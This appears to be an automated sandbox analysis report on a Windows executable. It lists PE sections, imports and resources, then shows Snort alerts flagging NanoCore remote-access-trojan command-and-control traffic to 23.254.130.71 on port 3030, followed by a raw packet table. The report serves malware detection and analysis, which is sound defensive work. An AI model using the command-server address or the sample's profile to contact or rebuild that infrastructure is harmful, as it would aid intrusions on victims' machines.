            IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000xa50.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

            Sections

            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x65720x6600False0.662300857843data6.45391938596IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            .rdata0x80000x13980x1400False0.449609375data5.13671758274IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data0xa0000x203780x600False0.5078125data4.09680908363IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
            .ndata0x2b0000x100000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .rsrc0x3b0000xa500xc00False0.402994791667data4.18988587465IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

            Resources

            NameRVASizeTypeLanguageCountry
            RT_ICON0x3b1900x2e8dataEnglishUnited States
            RT_DIALOG0x3b4780x100dataEnglishUnited States
            RT_DIALOG0x3b5780x11cdataEnglishUnited States
            RT_DIALOG0x3b6980x60dataEnglishUnited States
            RT_GROUP_ICON0x3b6f80x14dataEnglishUnited States
            RT_MANIFEST0x3b7100x340XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

            Imports

            DLLImport
            ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
            SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
            ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
            COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
            USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
            GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
            KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

            Possible Origin

            Language of compilation systemCountry where language is spokenMap
            EnglishUnited States

            Network Behavior

            Snort IDS Alerts

            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
            05/12/21-15:41:34.548350TCP2025019ET TROJAN Possible NanoCore C2 60B497453030192.168.2.423.254.130.71
            05/12/21-15:41:41.843567TCP2025019ET TROJAN Possible NanoCore C2 60B497463030192.168.2.423.254.130.71
            05/12/21-15:41:46.571158TCP2025019ET TROJAN Possible NanoCore C2 60B497473030192.168.2.423.254.130.71
            05/12/21-15:41:51.395995TCP2025019ET TROJAN Possible NanoCore C2 60B497483030192.168.2.423.254.130.71
            05/12/21-15:41:56.069794TCP2025019ET TROJAN Possible NanoCore C2 60B497503030192.168.2.423.254.130.71
            05/12/21-15:42:00.757206TCP2025019ET TROJAN Possible NanoCore C2 60B497553030192.168.2.423.254.130.71
            05/12/21-15:42:05.426115TCP2025019ET TROJAN Possible NanoCore C2 60B497633030192.168.2.423.254.130.71
            05/12/21-15:42:11.653205TCP2025019ET TROJAN Possible NanoCore C2 60B497693030192.168.2.423.254.130.71
            05/12/21-15:42:19.087468TCP2025019ET TROJAN Possible NanoCore C2 60B497703030192.168.2.423.254.130.71
            05/12/21-15:42:25.331297TCP2025019ET TROJAN Possible NanoCore C2 60B497713030192.168.2.423.254.130.71
            05/12/21-15:42:31.561598TCP2025019ET TROJAN Possible NanoCore C2 60B497723030192.168.2.423.254.130.71
            05/12/21-15:42:38.561876TCP2025019ET TROJAN Possible NanoCore C2 60B497733030192.168.2.423.254.130.71
            05/12/21-15:42:44.823846TCP2025019ET TROJAN Possible NanoCore C2 60B497773030192.168.2.423.254.130.71
            05/12/21-15:42:49.508873TCP2025019ET TROJAN Possible NanoCore C2 60B497783030192.168.2.423.254.130.71
            05/12/21-15:42:54.396373TCP2025019ET TROJAN Possible NanoCore C2 60B497793030192.168.2.423.254.130.71
            05/12/21-15:43:02.640724TCP2025019ET TROJAN Possible NanoCore C2 60B497803030192.168.2.423.254.130.71
            05/12/21-15:43:07.360825TCP2025019ET TROJAN Possible NanoCore C2 60B497813030192.168.2.423.254.130.71

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            May 12, 2021 15:40:56.026963949 CEST49717443192.168.2.4204.79.197.200
            May 12, 2021 15:40:56.064064026 CEST44349717204.79.197.200192.168.2.4
            May 12, 2021 15:40:56.065521002 CEST44349717204.79.197.200192.168.2.4
            May 12, 2021 15:40:56.065541983 CEST44349717204.79.197.200192.168.2.4
            May 12, 2021 15:40:56.065642118 CEST44349717204.79.197.200192.168.2.4
            May 12, 2021 15:40:56.065640926 CEST49717443192.168.2.4204.79.197.200
            May 12, 2021 15:40:56.065661907 CEST44349717204.79.197.200192.168.2.4
            May 12, 2021 15:40:56.065673113 CEST49717443192.168.2.4204.79.197.200
            May 12, 2021 15:40:56.065677881 CEST44349717204.79.197.200192.168.2.4
            May 12, 2021 15:40:56.065696001 CEST44349717204.79.197.200192.168.2.4
            May 12, 2021 15:40:56.065700054 CEST49717443192.168.2.4204.79.197.200
            May 12, 2021 15:40:56.065723896 CEST49717443192.168.2.4204.79.197.200
            May 12, 2021 15:40:56.065773010 CEST49717443192.168.2.4204.79.197.200
            May 12, 2021 15:40:56.376399994 CEST49717443192.168.2.4204.79.197.200
            May 12, 2021 15:40:56.379153013 CEST49717443192.168.2.4204.79.197.200
            May 12, 2021 15:40:56.379416943 CEST49717443192.168.2.4204.79.197.200
            May 12, 2021 15:40:56.411833048 CEST44349717204.79.197.200192.168.2.4
            May 12, 2021 15:40:56.413743019 CEST44349717204.79.197.200192.168.2.4
            May 12, 2021 15:40:56.413815022 CEST44349717204.79.197.200192.168.2.4
            May 12, 2021 15:40:56.413839102 CEST49717443192.168.2.4204.79.197.200
            May 12, 2021 15:40:56.413873911 CEST49717443192.168.2.4204.79.197.200
            May 12, 2021 15:40:56.414469004 CEST44349717204.79.197.200192.168.2.4
            May 12, 2021 15:40:56.414696932 CEST44349717204.79.197.200192.168.2.4
            May 12, 2021 15:40:56.414761066 CEST49717443192.168.2.4204.79.197.200
            May 12, 2021 15:40:56.414896965 CEST44349717204.79.197.200192.168.2.4
            May 12, 2021 15:40:56.449836969 CEST49717443192.168.2.4204.79.197.200
            May 12, 2021 15:40:56.460462093 CEST44349717204.79.197.200192.168.2.4
            May 12, 2021 15:40:56.460480928 CEST44349717204.79.197.200192.168.2.4
            May 12, 2021 15:40:56.460618019 CEST49717443192.168.2.4204.79.197.200
            May 12, 2021 15:40:56.485332012 CEST44349717204.79.197.200192.168.2.4
            May 12, 2021 15:40:58.139776945 CEST4970880192.168.2.493.184.220.29
            May 12, 2021 15:41:20.264144897 CEST804974313.224.186.242192.168.2.4
            May 12, 2021 15:41:20.264288902 CEST4974380192.168.2.413.224.186.242
            May 12, 2021 15:41:20.815228939 CEST44349745216.58.215.238192.168.2.4
            May 12, 2021 15:41:20.815392017 CEST49745443192.168.2.4216.58.215.238
            May 12, 2021 15:41:20.819276094 CEST44349741142.250.185.205192.168.2.4
            May 12, 2021 15:41:20.819477081 CEST49741443192.168.2.4142.250.185.205
            May 12, 2021 15:41:20.842755079 CEST44349742172.217.168.67192.168.2.4
            May 12, 2021 15:41:20.842927933 CEST49742443192.168.2.4172.217.168.67
            May 12, 2021 15:41:26.463403940 CEST44349758142.250.185.225192.168.2.4
            May 12, 2021 15:41:26.463473082 CEST49758443192.168.2.4142.250.185.225
            May 12, 2021 15:41:27.048073053 CEST49683443192.168.2.420.190.159.138
            May 12, 2021 15:41:27.048115969 CEST49683443192.168.2.420.190.159.138
            May 12, 2021 15:41:27.051733017 CEST49682443192.168.2.420.190.159.138
            May 12, 2021 15:41:27.051822901 CEST49682443192.168.2.420.190.159.138
            May 12, 2021 15:41:27.110873938 CEST4434968320.190.159.138192.168.2.4
            May 12, 2021 15:41:27.110907078 CEST4434968320.190.159.138192.168.2.4
            May 12, 2021 15:41:27.114084959 CEST4434968220.190.159.138192.168.2.4
            May 12, 2021 15:41:27.114109039 CEST4434968220.190.159.138192.168.2.4
            May 12, 2021 15:41:27.154938936 CEST4434968220.190.159.138192.168.2.4
            May 12, 2021 15:41:27.258677959 CEST4434968220.190.159.138192.168.2.4
            May 12, 2021 15:41:27.258714914 CEST4434968220.190.159.138192.168.2.4
            May 12, 2021 15:41:27.258738041 CEST4434968220.190.159.138192.168.2.4
            May 12, 2021 15:41:27.258750916 CEST49682443192.168.2.420.190.159.138
            May 12, 2021 15:41:27.258759975 CEST4434968220.190.159.138192.168.2.4
            May 12, 2021 15:41:27.258780003 CEST4434968220.190.159.138192.168.2.4
            May 12, 2021 15:41:27.258791924 CEST49682443192.168.2.420.190.159.138
            May 12, 2021 15:41:27.258802891 CEST4434968220.190.159.138192.168.2.4
            May 12, 2021 15:41:27.258830070 CEST4434968220.190.159.138192.168.2.4
            May 12, 2021 15:41:27.258837938 CEST49682443192.168.2.420.190.159.138
            May 12, 2021 15:41:27.258855104 CEST4434968220.190.159.138192.168.2.4
            May 12, 2021 15:41:27.258876085 CEST4434968220.190.159.138192.168.2.4
            May 12, 2021 15:41:27.258924007 CEST49682443192.168.2.420.190.159.138
            May 12, 2021 15:41:27.264658928 CEST4434968320.190.159.138192.168.2.4
            May 12, 2021 15:41:27.264698029 CEST4434968320.190.159.138192.168.2.4
            May 12, 2021 15:41:27.264713049 CEST4434968320.190.159.138192.168.2.4
            May 12, 2021 15:41:27.264730930 CEST4434968320.190.159.138192.168.2.4
            May 12, 2021 15:41:27.264749050 CEST4434968320.190.159.138192.168.2.4
            May 12, 2021 15:41:27.264765024 CEST4434968320.190.159.138192.168.2.4
            May 12, 2021 15:41:27.264785051 CEST4434968320.190.159.138192.168.2.4
            May 12, 2021 15:41:27.264802933 CEST4434968320.190.159.138192.168.2.4
            May 12, 2021 15:41:27.264818907 CEST4434968320.190.159.138192.168.2.4
            May 12, 2021 15:41:27.264822006 CEST49683443192.168.2.420.190.159.138
            May 12, 2021 15:41:27.264858007 CEST49683443192.168.2.420.190.159.138
            May 12, 2021 15:41:27.307136059 CEST49683443192.168.2.420.190.159.138
            May 12, 2021 15:41:27.913104057 CEST44349763172.217.23.42192.168.2.4
            May 12, 2021 15:41:27.913273096 CEST49763443192.168.2.4172.217.23.42
            May 12, 2021 15:41:34.330414057 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:34.497849941 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:34.498466969 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:34.548350096 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:34.735836029 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:34.736342907 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:34.945247889 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:34.949302912 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:35.118865967 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:35.119357109 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:35.347301006 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:35.347610950 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:35.570543051 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:35.570683002 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:35.787461042 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:35.787610054 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:35.840923071 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:35.840960026 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:35.840970993 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:35.840996027 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:35.841013908 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:35.841029882 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:35.841052055 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:35.841069937 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:35.841089964 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:35.841105938 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:35.841130018 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:35.841187954 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.006122112 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.009735107 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.009782076 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.009855032 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.009895086 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.009913921 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.009942055 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.009949923 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.009989977 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.010005951 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.010040998 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.010111094 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.010149002 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.010166883 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.010174990 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.010201931 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.010205984 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.010226011 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.010246038 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.010251999 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.010277033 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.010289907 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.010303020 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.010320902 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.010327101 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.010353088 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.010356903 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.010377884 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.010386944 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.010402918 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.010421991 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.010426998 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.010456085 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.010473967 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.010514975 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.179927111 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.179980040 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180016041 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180049896 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180074930 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180102110 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180130005 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180129051 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.180159092 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180186987 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180219889 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180224895 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.180298090 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.180318117 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180349112 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180372953 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180397034 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.180397987 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180404902 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.180422068 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180452108 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180457115 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.180481911 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180490971 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.180516005 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180529118 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.180541039 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180566072 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180568933 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.180588961 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180613041 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180639029 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180649996 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.180660963 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180686951 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.180696011 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180711985 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.180727959 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180752039 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.180759907 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180787086 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180788040 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.180813074 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180819035 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.180841923 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180854082 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.180865049 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.180870056 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180893898 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.180901051 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180931091 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180941105 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.180965900 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180968046 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.180990934 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.180995941 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.181016922 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.181021929 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.181041956 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.181052923 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.181067944 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.181072950 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.181092024 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.181102037 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.181116104 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.181127071 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.181155920 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.350182056 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.350228071 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.350253105 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.350280046 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.350305080 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.350328922 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.350357056 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.350362062 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.350382090 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.350409985 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.350421906 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.350436926 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.350455046 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.350462914 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.350486040 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.350486994 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.350512028 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.350533009 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.350533962 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.350558996 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.350575924 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.350583076 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.350606918 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.350610018 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.350655079 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.350975037 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.351006031 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.351037979 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.351063013 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.351085901 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.351102114 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.351111889 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.351129055 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.351138115 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.351157904 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.351161957 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.351190090 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.351216078 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.351216078 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.351242065 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.351257086 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.351267099 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.351283073 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.351294041 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.351320028 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.351326942 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.351344109 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.351357937 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.351370096 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.351397991 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.351399899 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.351422071 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.351448059 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.351464033 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.351470947 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.351495028 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.351516962 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.351525068 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.351540089 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.351556063 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.351564884 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.351583958 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.351591110 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.351614952 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.351628065 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.351638079 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.351659060 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.351670980 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.351681948 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.351705074 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.351710081 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.351727962 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.351752043 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.351799965 CEST497453030192.168.2.423.254.130.71
